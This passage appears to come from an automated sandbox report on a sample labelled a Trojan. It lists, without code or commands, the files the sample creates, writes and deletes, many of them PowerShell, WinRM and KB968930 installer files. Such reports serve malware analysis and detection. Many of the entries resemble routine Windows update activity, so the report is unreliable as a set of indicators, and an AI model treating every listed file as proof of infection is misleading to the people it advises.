C:\ea6d03fb84304f0031a48a\wsmplpxy.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\wevtfwd.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_escape_characters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe.mui (0 bytes)
C:\ea6d03fb84304f0031a48a\types.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_type_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\pwrshplugin.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_ref.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\registry.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\filesystem.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_2.0.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\diagnostics.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\wtrinstaller.ico (0 bytes)
C:\ea6d03fb84304f0031a48a\about_scopes.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_data_sections.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_requirements.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_pipelines.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\pspluginwkr.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\winrs.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmanhttpconfig.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_aliases.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_switch.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_wmi_cmdlets.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmwmipl.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\spmsg.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_job_details.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_locations.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrshost.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_troubleshooting.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\profile.ps1 (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\pscustomsetuputil.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\wsman.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_output.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.dll (0 bytes)

The process ngen.exe:3900 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)

The process ngen.exe:3924 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1106 bytes)

The process ngen.exe:3916 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (784 bytes)

The process ngen.exe:3496 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:3908 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (486 bytes)

The process ngen.exe:3416 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process ngen.exe:3536 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)

The process ngen.exe:3452 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)

The process ngen.exe:3552 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (800 bytes)

The process ngen.exe:3576 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (826 bytes)

The process ngen.exe:3436 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)

The process ngen.exe:3940 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (746 bytes)

The process ngen.exe:3488 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)

The process ngen.exe:3932 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1428 bytes)

The process ngen.exe:3520 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)

The process ngen.exe:3528 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)

The process ngen.exe:3544 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (468 bytes)

The process ngen.exe:3560 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1140 bytes)

The process ngen.exe:3428 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)

The process ngen.exe:3460 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)

The process ngen.exe:3376 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:3568 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (474 bytes)

The process ngen.exe:3444 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)

The process update.exe:1716 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5482 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5401 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (3267 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (139812 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (242903 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)

The Trojan deletes the following file(s):

%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%WinDir%\SECD0.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
